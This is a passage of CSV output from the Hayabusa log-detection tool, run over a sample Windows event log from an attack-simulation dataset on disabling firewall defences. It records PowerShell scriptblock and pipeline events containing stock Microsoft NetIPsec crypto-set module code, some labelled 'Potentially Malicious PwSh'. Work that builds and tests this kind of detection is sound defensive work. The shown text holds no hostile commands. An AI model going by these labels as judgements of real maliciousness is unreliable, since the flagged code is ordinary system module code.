[Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', 
$__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('MaxMinutes') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxMinutes}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeMinutes', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MaxSessions') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxSessions}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeSessions', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('ForceDiffieHellman') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForceDiffieHellman}) $__cmdletization_queryBuilder.FilterByProperty('ForceDiffieHellman', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains 
$PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 
'ByAssociatedNetIPsecMainModeRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = 
$__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetIPsecMainModeCryptoSet' -Alias '*'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.276 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock 
Log,"yDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { 
$__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('MaxMinutes') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxMinutes}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeMinutes', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MaxSessions') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxSessions}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeSessions', 
$__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('ForceDiffieHellman') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForceDiffieHellman}) $__cmdletization_queryBuilder.FilterByProperty('ForceDiffieHellman', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 
'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} 
$__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { 
$__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetIPsecMainModeCryptoSet' -Alias '*'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.277 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.277 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.280 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" 
ParameterBinding(Export-ModuleMember): name=""Function""; value=""New-NetIPsecMainModeCryptoSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.281 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetIPsecMainModeCryptoSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.282 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetIPsecMainModeCryptoSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.285 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetIPsecMainModeCryptoSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; 
value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.286 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Rename-NetIPsecMainModeCryptoSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.286 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Copy-NetIPsecMainModeCryptoSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.329 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetIKEQMCryptoSet' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] 
$script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecQuickModeCryptoSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('ID')] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('PfsGroup')] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${Default}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) 
DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { 
